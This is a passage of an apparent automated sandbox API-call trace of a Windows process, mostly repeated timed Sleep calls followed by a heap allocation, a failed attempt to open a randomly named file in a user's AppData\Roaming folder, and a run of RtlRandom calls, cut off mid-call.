(dwMilliseconds=0x258) [0299.814] Sleep (dwMilliseconds=0x258) [0299.826] Sleep (dwMilliseconds=0x258) [0299.827] Sleep (dwMilliseconds=0x258) [0299.865] Sleep (dwMilliseconds=0x258) [0299.905] Sleep (dwMilliseconds=0x258) [0299.945] Sleep (dwMilliseconds=0x258) [0299.952] Sleep (dwMilliseconds=0x258) [0299.953] Sleep (dwMilliseconds=0x258) [0299.984] Sleep (dwMilliseconds=0x258) [0300.027] Sleep (dwMilliseconds=0x258) [0300.074] Sleep (dwMilliseconds=0x258) [0300.076] Sleep (dwMilliseconds=0x258) [0300.078] Sleep (dwMilliseconds=0x258) [0300.135] Sleep (dwMilliseconds=0x258) [0300.178] Sleep (dwMilliseconds=0x258) [0300.225] Sleep (dwMilliseconds=0x258) [0300.227] Sleep (dwMilliseconds=0x258) [0300.238] Sleep (dwMilliseconds=0x258) [0300.275] Sleep (dwMilliseconds=0x258) [0300.310] Sleep (dwMilliseconds=0x258) [0300.316] Sleep (dwMilliseconds=0x258) [0300.353] Sleep (dwMilliseconds=0x258) [0300.392] Sleep (dwMilliseconds=0x258) [0300.406] Sleep (dwMilliseconds=0x258) [0300.432] Sleep (dwMilliseconds=0x258) [0300.471] Sleep (dwMilliseconds=0x258) [0300.507] Sleep (dwMilliseconds=0x258) [0300.513] Sleep (dwMilliseconds=0x258) [0300.552] Sleep (dwMilliseconds=0x258) [0300.597] Sleep (dwMilliseconds=0x258) [0300.622] Sleep (dwMilliseconds=0x258) [0300.639] Sleep (dwMilliseconds=0x258) [0300.675] Sleep (dwMilliseconds=0x258) [0300.710] Sleep (dwMilliseconds=0x258) [0300.717] Sleep (dwMilliseconds=0x258) [0300.753] Sleep (dwMilliseconds=0x258) [0300.792] Sleep (dwMilliseconds=0x258) [0300.828] Sleep (dwMilliseconds=0x258) [0300.874] Sleep (dwMilliseconds=0x258) [0300.883] Sleep (dwMilliseconds=0x258) [0300.885] Sleep (dwMilliseconds=0x258) [0300.914] Sleep (dwMilliseconds=0x258) [0301.028] Sleep (dwMilliseconds=0x258) [0301.053] Sleep (dwMilliseconds=0x258) [0301.087] Sleep (dwMilliseconds=0x258) [0301.128] Sleep (dwMilliseconds=0x258) [0301.153] Sleep (dwMilliseconds=0x258) [0301.172] Sleep (dwMilliseconds=0x258) [0301.245] Sleep (dwMilliseconds=0x258) [0301.287] Sleep (dwMilliseconds=0x258) [0301.306] Sleep (dwMilliseconds=0x258) [0301.308] Sleep (dwMilliseconds=0x258) [0301.340] Sleep (dwMilliseconds=0x258) [0301.380] Sleep (dwMilliseconds=0x258) [0301.422] Sleep (dwMilliseconds=0x258) [0301.424] Sleep (dwMilliseconds=0x258) [0301.427] Sleep (dwMilliseconds=0x258) [0301.464] Sleep (dwMilliseconds=0x258) [0301.512] Sleep (dwMilliseconds=0x258) [0301.551] Sleep (dwMilliseconds=0x258) [0301.556] Sleep (dwMilliseconds=0x258) [0301.596] Sleep (dwMilliseconds=0x258) [0301.636] Sleep (dwMilliseconds=0x258) [0301.666] Sleep (dwMilliseconds=0x258) [0301.676] Sleep (dwMilliseconds=0x258) [0301.714] Sleep (dwMilliseconds=0x258) [0301.754] Sleep (dwMilliseconds=0x258) [0301.774] Sleep (dwMilliseconds=0x258) [0301.776] Sleep (dwMilliseconds=0x258) [0301.795] Sleep (dwMilliseconds=0x258) [0301.833] Sleep (dwMilliseconds=0x258) [0301.878] Sleep (dwMilliseconds=0x258) [0301.887] Sleep (dwMilliseconds=0x258) [0301.891] Sleep (dwMilliseconds=0x258) [0301.934] Sleep (dwMilliseconds=0x258) [0301.973] Sleep (dwMilliseconds=0x258) [0301.990] Sleep (dwMilliseconds=0x258) [0301.994] Sleep (dwMilliseconds=0x258) [0302.012] Sleep (dwMilliseconds=0x258) [0302.050] Sleep (dwMilliseconds=0x258) [0302.103] Sleep (dwMilliseconds=0x258) [0302.105] Sleep (dwMilliseconds=0x258) [0302.112] Sleep (dwMilliseconds=0x258) [0302.155] Sleep (dwMilliseconds=0x258) [0302.209] Sleep (dwMilliseconds=0x258) [0302.220] Sleep (dwMilliseconds=0x258) [0302.250] Sleep (dwMilliseconds=0x258) [0302.286] Sleep (dwMilliseconds=0x258) [0302.318] Sleep (dwMilliseconds=0x258) [0302.320] Sleep (dwMilliseconds=0x258) [0302.335] Sleep (dwMilliseconds=0x258) [0302.373] Sleep (dwMilliseconds=0x258) [0302.411] Sleep (dwMilliseconds=0x258) [0302.415] Sleep (dwMilliseconds=0x258) [0302.417] Sleep (dwMilliseconds=0x258) [0302.451] Sleep (dwMilliseconds=0x258) [0302.492] Sleep (dwMilliseconds=0x258) [0302.510] Sleep (dwMilliseconds=0x258) [0302.534] Sleep (dwMilliseconds=0x258) [0302.571] Sleep (dwMilliseconds=0x258) [0302.596] Sleep (dwMilliseconds=0x258) [0302.597] Sleep (dwMilliseconds=0x258) [0302.613] Sleep (dwMilliseconds=0x258) [0302.649] Sleep (dwMilliseconds=0x258) [0302.682] Sleep (dwMilliseconds=0x258) [0302.683] Sleep (dwMilliseconds=0x258) [0302.689] Sleep (dwMilliseconds=0x258) [0302.725] Sleep (dwMilliseconds=0x258) [0302.764] Sleep (dwMilliseconds=0x258) [0302.773] Sleep (dwMilliseconds=0x258) [0302.775] Sleep (dwMilliseconds=0x258) [0302.803] Sleep (dwMilliseconds=0x258) [0302.841] Sleep (dwMilliseconds=0x258) [0302.875] Sleep (dwMilliseconds=0x258) [0302.877] Sleep (dwMilliseconds=0x258) [0302.887] Sleep (dwMilliseconds=0x258) [0302.924] Sleep (dwMilliseconds=0x258) [0302.961] Sleep (dwMilliseconds=0x258) [0302.965] Sleep (dwMilliseconds=0x258) [0303.001] Sleep (dwMilliseconds=0x258) [0303.038] Sleep (dwMilliseconds=0x258) [0303.047] Sleep (dwMilliseconds=0x258) [0303.089] Sleep (dwMilliseconds=0x258) [0303.127] Sleep (dwMilliseconds=0x258) [0303.148] Sleep (dwMilliseconds=0x258) [0303.149] Sleep (dwMilliseconds=0x258) [0303.167] Sleep (dwMilliseconds=0x258) [0303.221] Sleep (dwMilliseconds=0x258) [0303.254] Sleep (dwMilliseconds=0x258) [0303.260] Sleep (dwMilliseconds=0x258) [0303.296] Sleep (dwMilliseconds=0x258) [0303.374] Sleep (dwMilliseconds=0x258) [0303.382] Sleep (dwMilliseconds=0x258) [0303.383] Sleep (dwMilliseconds=0x258) [0303.415] Sleep (dwMilliseconds=0x258) [0303.453] Sleep (dwMilliseconds=0x258) [0303.489] Sleep (dwMilliseconds=0x258) [0303.491] Sleep (dwMilliseconds=0x258) [0303.497] Sleep (dwMilliseconds=0x258) [0303.537] Sleep (dwMilliseconds=0x258) [0303.578] Sleep (dwMilliseconds=0x258) [0303.599] Sleep (dwMilliseconds=0x258) [0303.618] Sleep (dwMilliseconds=0x258) [0303.655] Sleep (dwMilliseconds=0x258) [0303.695] Sleep (dwMilliseconds=0x258) [0303.708] Sleep (dwMilliseconds=0x258) [0303.710] Sleep (dwMilliseconds=0x258) [0303.735] Sleep (dwMilliseconds=0x258) [0303.772] Sleep (dwMilliseconds=0x258) [0303.815] Sleep (dwMilliseconds=0x258) [0303.842] Sleep (dwMilliseconds=0x258) [0303.885] Sleep (dwMilliseconds=0x258) [0303.924] Sleep (dwMilliseconds=0x258) [0303.960] Sleep (dwMilliseconds=0x258) [0303.962] Sleep (dwMilliseconds=0x258) [0303.963] Sleep (dwMilliseconds=0x258) [0304.000] Sleep (dwMilliseconds=0x258) [0304.044] Sleep (dwMilliseconds=0x258) [0304.082] Sleep (dwMilliseconds=0x258) [0304.095] Sleep (dwMilliseconds=0x258) [0304.124] Sleep (dwMilliseconds=0x258) [0304.163] Sleep (dwMilliseconds=0x258) [0304.217] Sleep (dwMilliseconds=0x258) [0304.222] Sleep (dwMilliseconds=0x258) [0304.224] Sleep (dwMilliseconds=0x258) [0304.257] Sleep (dwMilliseconds=0x258) [0304.293] Sleep (dwMilliseconds=0x258) [0304.310] Sleep (dwMilliseconds=0x258) [0304.333] Sleep (dwMilliseconds=0x258) [0304.373] Sleep (dwMilliseconds=0x258) [0304.405] Sleep (dwMilliseconds=0x258) [0304.407] Sleep (dwMilliseconds=0x258) [0304.414] Sleep (dwMilliseconds=0x258) [0304.451] Sleep (dwMilliseconds=0x258) [0304.488] Sleep (dwMilliseconds=0x258) [0304.548] Sleep (dwMilliseconds=0x258) [0304.579] Sleep (dwMilliseconds=0x258) [0304.629] Sleep (dwMilliseconds=0x258) [0304.654] Sleep (dwMilliseconds=0x258) [0304.673] Sleep (dwMilliseconds=0x258) [0304.731] Sleep (dwMilliseconds=0x258) [0304.796] Sleep (dwMilliseconds=0x258) [0304.801] Sleep (dwMilliseconds=0x258) [0304.840] Sleep (dwMilliseconds=0x258) [0304.892] Sleep (dwMilliseconds=0x258) [0304.923] Sleep (dwMilliseconds=0x258) [0304.925] Sleep (dwMilliseconds=0x258) [0304.941] Sleep (dwMilliseconds=0x258) [0304.981] Sleep (dwMilliseconds=0x258) [0305.019] Sleep (dwMilliseconds=0x258) [0305.021] Sleep (dwMilliseconds=0x258) [0305.067] Sleep (dwMilliseconds=0x258) [0305.108] Sleep (dwMilliseconds=0x258) [0305.123] Sleep (dwMilliseconds=0x258) [0305.125] Sleep (dwMilliseconds=0x258) [0305.150] Sleep (dwMilliseconds=0x258) [0305.186] Sleep (dwMilliseconds=0x258) [0305.233] Sleep (dwMilliseconds=0x258) [0305.234] Sleep (dwMilliseconds=0x258) [0305.244] Sleep (dwMilliseconds=0x258) [0305.282] Sleep (dwMilliseconds=0x258) [0305.319] Sleep (dwMilliseconds=0x258) [0305.323] Sleep (dwMilliseconds=0x258) [0305.325] Sleep (dwMilliseconds=0x258) [0305.359] Sleep (dwMilliseconds=0x258) [0305.397] Sleep (dwMilliseconds=0x258) [0305.418] Sleep (dwMilliseconds=0x258) [0305.421] Sleep (dwMilliseconds=0x258) [0305.440] Sleep (dwMilliseconds=0x258) [0305.480] Sleep (dwMilliseconds=0x258) [0305.520] Sleep (dwMilliseconds=0x258) [0305.531] Sleep (dwMilliseconds=0x258) [0305.534] Sleep (dwMilliseconds=0x258) [0305.562] Sleep (dwMilliseconds=0x258) [0305.598] Sleep (dwMilliseconds=0x258) [0305.623] Sleep (dwMilliseconds=0x258) [0305.624] Sleep (dwMilliseconds=0x258) [0305.638] Sleep (dwMilliseconds=0x258) [0305.674] Sleep (dwMilliseconds=0x258) [0305.751] Sleep (dwMilliseconds=0x258) [0305.752] Sleep (dwMilliseconds=0x258) [0305.790] Sleep (dwMilliseconds=0x258) [0305.829] Sleep (dwMilliseconds=0x258) [0305.846] Sleep (dwMilliseconds=0x258) [0305.847] Sleep (dwMilliseconds=0x258) [0305.868] Sleep (dwMilliseconds=0x258) [0305.906] Sleep (dwMilliseconds=0x258) [0305.942] Sleep (dwMilliseconds=0x258) [0305.950] Sleep (dwMilliseconds=0x258) [0305.988] Sleep (dwMilliseconds=0x258) [0306.026] Sleep (dwMilliseconds=0x258) [0306.046] Sleep (dwMilliseconds=0x258) [0306.074] Sleep (dwMilliseconds=0x258) [0306.112] Sleep (dwMilliseconds=0x258) [0306.162] Sleep (dwMilliseconds=0x258) [0306.179] Sleep (dwMilliseconds=0x258) [0306.236] Sleep (dwMilliseconds=0x258) [0306.278] Sleep (dwMilliseconds=0x258) [0306.317] Sleep (dwMilliseconds=0x258) [0306.352] Sleep (dwMilliseconds=0x258) [0306.367] Sleep (dwMilliseconds=0x258) [0306.406] Sleep (dwMilliseconds=0x258) [0306.447] Sleep (dwMilliseconds=0x258) [0306.475] Sleep (dwMilliseconds=0x258) [0306.487] Sleep (dwMilliseconds=0x258) [0306.525] Sleep (dwMilliseconds=0x258) [0306.564] Sleep (dwMilliseconds=0x258) [0306.597] Sleep (dwMilliseconds=0x258) [0306.599] Sleep (dwMilliseconds=0x258) [0306.604] Sleep (dwMilliseconds=0x258) [0306.644] Sleep (dwMilliseconds=0x258) [0306.683] Sleep (dwMilliseconds=0x258) [0306.717] Sleep (dwMilliseconds=0x258) [0306.721] Sleep (dwMilliseconds=0x258) [0306.730] Sleep (dwMilliseconds=0x258) [0306.768] Sleep (dwMilliseconds=0x258) [0306.827] Sleep (dwMilliseconds=0x258) [0306.846] Sleep (dwMilliseconds=0x258) [0306.939] Sleep (dwMilliseconds=0x258) [0307.067] Sleep (dwMilliseconds=0x258) [0307.144] Sleep (dwMilliseconds=0x258) [0307.191] Sleep (dwMilliseconds=0x258) [0307.254] Sleep (dwMilliseconds=0x258) [0307.294] Sleep (dwMilliseconds=0x258) [0307.337] Sleep (dwMilliseconds=0x258) [0307.364] Sleep (dwMilliseconds=0x258) [0307.380] Sleep (dwMilliseconds=0x258) [0307.417] Sleep (dwMilliseconds=0x258) [0307.456] Sleep (dwMilliseconds=0x258) [0307.471] Sleep (dwMilliseconds=0x258) [0307.497] Sleep (dwMilliseconds=0x258) [0307.538] Sleep (dwMilliseconds=0x258) [0307.577] Sleep (dwMilliseconds=0x258) [0307.579] Sleep (dwMilliseconds=0x258) [0307.580] Sleep (dwMilliseconds=0x258) [0307.615] Sleep (dwMilliseconds=0x258) [0307.653] Sleep (dwMilliseconds=0x258) [0307.681] Sleep (dwMilliseconds=0x258) [0307.683] Sleep (dwMilliseconds=0x258) [0307.693] Sleep (dwMilliseconds=0x258) [0307.731] Sleep (dwMilliseconds=0x258) [0307.780] Sleep (dwMilliseconds=0x258) [0307.818] Sleep (dwMilliseconds=0x258) [0307.856] Sleep (dwMilliseconds=0x258) [0307.885] Sleep (dwMilliseconds=0x258) [0307.898] Sleep (dwMilliseconds=0x258) [0307.935] Sleep (dwMilliseconds=0x258) [0307.973] Sleep (dwMilliseconds=0x258) [0308.049] Sleep (dwMilliseconds=0x258) [0308.051] Sleep (dwMilliseconds=0x258) [0308.140] Sleep (dwMilliseconds=0x258) [0308.179] Sleep (dwMilliseconds=0x258) [0308.236] Sleep (dwMilliseconds=0x258) [0308.248] Sleep (dwMilliseconds=0x258) [0308.249] Sleep (dwMilliseconds=0x258) [0308.276] Sleep (dwMilliseconds=0x258) [0308.314] Sleep (dwMilliseconds=0x258) [0308.351] Sleep (dwMilliseconds=0x258) [0308.356] Sleep (dwMilliseconds=0x258) [0308.357] Sleep (dwMilliseconds=0x258) [0309.079] Sleep (dwMilliseconds=0x258) [0309.137] Sleep (dwMilliseconds=0x258) [0309.189] Sleep (dwMilliseconds=0x258) [0309.214] Sleep (dwMilliseconds=0x258) [0309.221] Sleep (dwMilliseconds=0x258) [0309.302] Sleep (dwMilliseconds=0x258) [0309.340] Sleep (dwMilliseconds=0x258) [0309.346] Sleep (dwMilliseconds=0x258) [0309.378] Sleep (dwMilliseconds=0x258) [0309.415] Sleep (dwMilliseconds=0x258) [0309.427] Sleep (dwMilliseconds=0x258) [0309.429] Sleep (dwMilliseconds=0x258) [0309.453] Sleep (dwMilliseconds=0x258) [0309.489] Sleep (dwMilliseconds=0x258) [0309.508] Sleep (dwMilliseconds=0x258) [0309.529] Sleep (dwMilliseconds=0x258) [0309.566] Sleep (dwMilliseconds=0x258) [0309.603] Sleep (dwMilliseconds=0x258) [0309.604] Sleep (dwMilliseconds=0x258) [0309.640] Sleep (dwMilliseconds=0x258) [0309.677] Sleep (dwMilliseconds=0x258) [0309.685] Sleep (dwMilliseconds=0x258) [0309.686] Sleep (dwMilliseconds=0x258) [0309.720] Sleep (dwMilliseconds=0x258) [0309.758] Sleep (dwMilliseconds=0x258) [0309.817] Sleep (dwMilliseconds=0x258) [0309.822] Sleep (dwMilliseconds=0x258) [0309.858] Sleep (dwMilliseconds=0x258) [0309.895] Sleep (dwMilliseconds=0x258) [0309.923] Sleep (dwMilliseconds=0x258) [0309.924] Sleep (dwMilliseconds=0x258) [0309.941] Sleep (dwMilliseconds=0x258) [0309.977] Sleep (dwMilliseconds=0x258) [0310.014] Sleep (dwMilliseconds=0x258) [0310.016] Sleep (dwMilliseconds=0x258) [0310.053] Sleep (dwMilliseconds=0x258) [0310.099] Sleep (dwMilliseconds=0x258) [0310.184] Sleep (dwMilliseconds=0x258) [0310.186] Sleep (dwMilliseconds=0x258) [0310.239] Sleep (dwMilliseconds=0x258) [0310.288] Sleep (dwMilliseconds=0x258) [0310.323] Sleep (dwMilliseconds=0x258) [0310.328] Sleep (dwMilliseconds=0x258) [0310.330] Sleep (dwMilliseconds=0x258) [0310.371] Sleep (dwMilliseconds=0x258) [0310.406] Sleep (dwMilliseconds=0x258) [0310.494] Sleep (dwMilliseconds=0x258) [0310.499] Sleep (dwMilliseconds=0x258) [0310.540] Sleep (dwMilliseconds=0x258) [0310.581] Sleep (dwMilliseconds=0x258) [0310.613] Sleep (dwMilliseconds=0x258) [0310.614] Sleep (dwMilliseconds=0x258) [0310.621] Sleep (dwMilliseconds=0x258) [0310.669] Sleep (dwMilliseconds=0x258) [0310.708] Sleep (dwMilliseconds=0x258) [0310.738] Sleep (dwMilliseconds=0x258) [0310.740] Sleep (dwMilliseconds=0x258) [0310.751] Sleep (dwMilliseconds=0x258) [0310.823] Sleep (dwMilliseconds=0x258) [0310.878] Sleep (dwMilliseconds=0x258) [0310.898] Sleep (dwMilliseconds=0x258) [0310.899] Sleep (dwMilliseconds=0x258) [0310.919] Sleep (dwMilliseconds=0x258) [0310.959] Sleep (dwMilliseconds=0x258) [0310.999] Sleep (dwMilliseconds=0x258) [0311.015] Sleep (dwMilliseconds=0x258) [0311.017] Sleep (dwMilliseconds=0x258) [0311.047] Sleep (dwMilliseconds=0x258) [0311.103] Sleep (dwMilliseconds=0x258) [0311.162] Sleep (dwMilliseconds=0x258) [0311.165] Sleep (dwMilliseconds=0x258) [0311.201] Sleep (dwMilliseconds=0x258) [0311.237] Sleep (dwMilliseconds=0x258) [0311.274] Sleep (dwMilliseconds=0x258) [0311.275] Sleep (dwMilliseconds=0x258) [0311.277] Sleep (dwMilliseconds=0x258) [0311.315] Sleep (dwMilliseconds=0x258) [0311.371] Sleep (dwMilliseconds=0x258) [0311.387] Sleep (dwMilliseconds=0x258) [0311.416] Sleep (dwMilliseconds=0x258) [0311.453] Sleep (dwMilliseconds=0x258) [0311.497] Sleep (dwMilliseconds=0x258) [0311.523] Sleep (dwMilliseconds=0x258) [0311.562] Sleep (dwMilliseconds=0x258) [0311.600] Sleep (dwMilliseconds=0x258) [0311.677] Sleep (dwMilliseconds=0x258) [0311.686] Sleep (dwMilliseconds=0x258) [0311.723] Sleep (dwMilliseconds=0x258) [0311.760] Sleep (dwMilliseconds=0x258) [0311.862] Sleep (dwMilliseconds=0x258) [0311.873] Sleep (dwMilliseconds=0x258) [0311.912] Sleep (dwMilliseconds=0x258) [0311.953] Sleep (dwMilliseconds=0x258) [0311.972] Sleep (dwMilliseconds=0x258) [0311.973] Sleep (dwMilliseconds=0x258) [0311.996] Sleep (dwMilliseconds=0x258) [0312.047] Sleep (dwMilliseconds=0x258) [0312.113] Sleep (dwMilliseconds=0x258) [0312.133] Sleep (dwMilliseconds=0x258) [0312.134] Sleep (dwMilliseconds=0x258) [0312.165] Sleep (dwMilliseconds=0x258) [0312.204] Sleep (dwMilliseconds=0x258) [0312.245] Sleep (dwMilliseconds=0x258) [0312.252] Sleep (dwMilliseconds=0x258) [0312.254] Sleep (dwMilliseconds=0x258) [0312.289] Sleep (dwMilliseconds=0x258) [0312.332] Sleep (dwMilliseconds=0x258) [0312.374] Sleep (dwMilliseconds=0x258) [0312.383] Sleep (dwMilliseconds=0x258) [0312.420] Sleep (dwMilliseconds=0x258) [0312.457] Sleep (dwMilliseconds=0x258) [0312.477] Sleep (dwMilliseconds=0x258) [0312.499] Sleep (dwMilliseconds=0x258) [0312.538] Sleep (dwMilliseconds=0x258) [0312.577] Sleep (dwMilliseconds=0x258) [0312.582] Sleep (dwMilliseconds=0x258) [0312.588] Sleep (dwMilliseconds=0x258) [0312.629] Sleep (dwMilliseconds=0x258) [0312.666] Sleep (dwMilliseconds=0x258) [0312.706] Sleep (dwMilliseconds=0x258) [0312.734] Sleep (dwMilliseconds=0x258) [0312.736] Sleep (dwMilliseconds=0x258) [0312.771] Sleep (dwMilliseconds=0x258) [0312.965] Sleep (dwMilliseconds=0x258) [0313.006] Sleep (dwMilliseconds=0x258) [0313.009] Sleep (dwMilliseconds=0x258) [0313.016] Sleep (dwMilliseconds=0x258) [0313.071] Sleep (dwMilliseconds=0x258) [0313.121] Sleep (dwMilliseconds=0x258) [0313.150] Sleep (dwMilliseconds=0x258) [0313.156] Sleep (dwMilliseconds=0x258) [0313.171] Sleep (dwMilliseconds=0x258) [0313.211] Sleep (dwMilliseconds=0x258) [0313.263] Sleep (dwMilliseconds=0x258) [0313.280] Sleep (dwMilliseconds=0x258) [0313.304] Sleep (dwMilliseconds=0x258) [0313.340] Sleep (dwMilliseconds=0x258) [0313.365] Sleep (dwMilliseconds=0x258) [0313.381] Sleep (dwMilliseconds=0x258) [0313.419] Sleep (dwMilliseconds=0x258) [0313.455] Sleep (dwMilliseconds=0x258) [0313.457] Sleep (dwMilliseconds=0x258) [0313.459] Sleep (dwMilliseconds=0x258) [0313.495] Sleep (dwMilliseconds=0x258) [0313.532] Sleep (dwMilliseconds=0x258) [0313.551] Sleep (dwMilliseconds=0x258) [0313.583] Sleep (dwMilliseconds=0x258) [0313.623] Sleep (dwMilliseconds=0x258) [0313.663] Sleep (dwMilliseconds=0x258) [0313.671] Sleep (dwMilliseconds=0x258) [0313.702] Sleep (dwMilliseconds=0x258) [0313.741] Sleep (dwMilliseconds=0x258) [0313.781] Sleep (dwMilliseconds=0x258) [0313.784] Sleep (dwMilliseconds=0x258) [0313.859] Sleep (dwMilliseconds=0x258) [0313.900] Sleep (dwMilliseconds=0x258) [0313.934] Sleep (dwMilliseconds=0x258) [0313.936] Sleep (dwMilliseconds=0x258) [0313.946] Sleep (dwMilliseconds=0x258) [0313.990] Sleep (dwMilliseconds=0x258) [0314.080] Sleep (dwMilliseconds=0x258) [0314.100] Sleep (dwMilliseconds=0x258) [0314.101] Sleep (dwMilliseconds=0x258) [0314.122] Sleep (dwMilliseconds=0x258) [0314.168] Sleep (dwMilliseconds=0x258) [0314.209] Sleep (dwMilliseconds=0x258) [0314.218] Sleep (dwMilliseconds=0x258) [0314.219] Sleep (dwMilliseconds=0x258) [0314.250] Sleep (dwMilliseconds=0x258) [0314.290] Sleep (dwMilliseconds=0x258) [0314.332] Sleep (dwMilliseconds=0x258) [0314.335] Sleep (dwMilliseconds=0x258) [0314.340] Sleep (dwMilliseconds=0x258) [0314.378] Sleep (dwMilliseconds=0x258) [0314.421] Sleep (dwMilliseconds=0x258) [0314.448] Sleep (dwMilliseconds=0x258) [0314.449] Sleep (dwMilliseconds=0x258) [0314.461] Sleep (dwMilliseconds=0x258) [0314.505] Sleep (dwMilliseconds=0x258) [0314.547] Sleep (dwMilliseconds=0x258) [0314.563] Sleep (dwMilliseconds=0x258) [0314.566] Sleep (dwMilliseconds=0x258) [0314.595] Sleep (dwMilliseconds=0x258) [0314.634] Sleep (dwMilliseconds=0x258) [0314.669] Sleep (dwMilliseconds=0x258) [0314.672] Sleep (dwMilliseconds=0x258) [0314.709] Sleep (dwMilliseconds=0x258) [0314.748] Sleep (dwMilliseconds=0x258) [0314.787] Sleep (dwMilliseconds=0x258) [0314.837] Sleep (dwMilliseconds=0x258) [0314.877] Sleep (dwMilliseconds=0x258) [0314.926] Sleep (dwMilliseconds=0x258) [0314.969] Sleep (dwMilliseconds=0x258) [0314.975] Sleep (dwMilliseconds=0x258) [0315.048] Sleep (dwMilliseconds=0x258) [0315.114] Sleep (dwMilliseconds=0x258) [0315.170] Sleep (dwMilliseconds=0x258) [0315.175] Sleep (dwMilliseconds=0x258) [0315.277] Sleep (dwMilliseconds=0x258) [0315.427] Sleep (dwMilliseconds=0x258) [0315.455] Sleep (dwMilliseconds=0x258) [0315.456] Sleep (dwMilliseconds=0x258) [0315.469] Sleep (dwMilliseconds=0x258) [0315.505] Sleep (dwMilliseconds=0x258) [0315.539] Sleep (dwMilliseconds=0x258) [0315.545] Sleep (dwMilliseconds=0x258) [0315.588] Sleep (dwMilliseconds=0x258) [0315.634] Sleep (dwMilliseconds=0x258) [0315.642] Sleep (dwMilliseconds=0x258) [0315.673] Sleep (dwMilliseconds=0x258) [0315.712] Sleep (dwMilliseconds=0x258) [0315.740] Sleep (dwMilliseconds=0x258) [0315.753] Sleep (dwMilliseconds=0x258) [0315.843] Sleep (dwMilliseconds=0x258) [0315.880] Sleep (dwMilliseconds=0x258) [0315.887] Sleep (dwMilliseconds=0x258) [0315.889] Sleep (dwMilliseconds=0x258) [0315.934] Sleep (dwMilliseconds=0x258) [0315.978] Sleep (dwMilliseconds=0x258) [0315.990] Sleep (dwMilliseconds=0x258) [0315.992] Sleep (dwMilliseconds=0x258) [0316.021] Sleep (dwMilliseconds=0x258) [0316.071] Sleep (dwMilliseconds=0x258) [0316.101] Sleep (dwMilliseconds=0x258) [0316.103] Sleep (dwMilliseconds=0x258) [0316.113] Sleep (dwMilliseconds=0x258) [0316.217] Sleep (dwMilliseconds=0x258) [0316.263] Sleep (dwMilliseconds=0x258) [0316.265] Sleep (dwMilliseconds=0x258) [0316.306] Sleep (dwMilliseconds=0x258) [0316.350] Sleep (dwMilliseconds=0x258) [0316.430] Sleep (dwMilliseconds=0x258) [0316.461] Sleep (dwMilliseconds=0x258) [0316.515] Sleep (dwMilliseconds=0x258) [0316.560] Sleep (dwMilliseconds=0x258) [0316.635] Sleep (dwMilliseconds=0x258) [0316.656] Sleep (dwMilliseconds=0x258) [0316.677] Sleep (dwMilliseconds=0x258) [0316.718] Sleep (dwMilliseconds=0x258) [0316.761] Sleep (dwMilliseconds=0x258) [0316.846] Sleep (dwMilliseconds=0x258) [0316.873] Sleep (dwMilliseconds=0x258) [0316.913] Sleep (dwMilliseconds=0x258) [0316.954] Sleep (dwMilliseconds=0x258) [0316.971] Sleep (dwMilliseconds=0x258) [0316.986] Sleep (dwMilliseconds=0x258) [0317.008] Sleep (dwMilliseconds=0x258) [0317.046] Sleep (dwMilliseconds=0x258) [0317.103] Sleep (dwMilliseconds=0x258) [0317.117] Sleep (dwMilliseconds=0x258) [0317.119] Sleep (dwMilliseconds=0x258) [0317.143] Sleep (dwMilliseconds=0x258) [0317.182] Sleep (dwMilliseconds=0x258) [0317.221] Sleep (dwMilliseconds=0x258) [0317.229] Sleep (dwMilliseconds=0x258) [0317.231] Sleep (dwMilliseconds=0x258) [0317.268] Sleep (dwMilliseconds=0x258) [0317.307] Sleep (dwMilliseconds=0x258) [0317.332] Sleep (dwMilliseconds=0x258) [0317.347] Sleep (dwMilliseconds=0x258) [0317.386] Sleep (dwMilliseconds=0x258) [0317.421] Sleep (dwMilliseconds=0x258) [0317.426] Sleep (dwMilliseconds=0x258) [0317.471] Sleep (dwMilliseconds=0x258) [0317.515] Sleep (dwMilliseconds=0x258) [0317.532] Sleep (dwMilliseconds=0x258) [0317.557] Sleep (dwMilliseconds=0x258) [0317.597] Sleep (dwMilliseconds=0x258) [0317.636] Sleep (dwMilliseconds=0x258) [0317.650] Sleep (dwMilliseconds=0x258) [0317.678] Sleep (dwMilliseconds=0x258) [0317.716] Sleep (dwMilliseconds=0x258) [0317.755] Sleep (dwMilliseconds=0x258) [0317.768] Sleep (dwMilliseconds=0x258) [0317.770] Sleep (dwMilliseconds=0x258) [0317.848] Sleep (dwMilliseconds=0x258) [0317.887] Sleep (dwMilliseconds=0x258) [0317.911] Sleep (dwMilliseconds=0x258) [0317.913] Sleep (dwMilliseconds=0x258) [0317.927] Sleep (dwMilliseconds=0x258) [0317.964] Sleep (dwMilliseconds=0x258) [0318.001] Sleep (dwMilliseconds=0x258) [0318.002] Sleep (dwMilliseconds=0x258) [0318.004] Sleep (dwMilliseconds=0x258) [0318.042] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x1d) returned 0x7d41840 [0318.043] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0318.044] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4faf0dbb [0318.044] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x103) returned 0x7d41870 [0318.044] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x24970b [0318.044] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4cc32697 [0318.044] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe1efed91 [0318.044] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2910b05c [0318.044] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x69080e69 [0318.044] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xee634233 [0318.044] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7851f528 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa5142136 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdc450eb2 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdccafa50 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe96ff7ef [0318.045] RtlRandom (in: Seed=0x2830e9e | out: 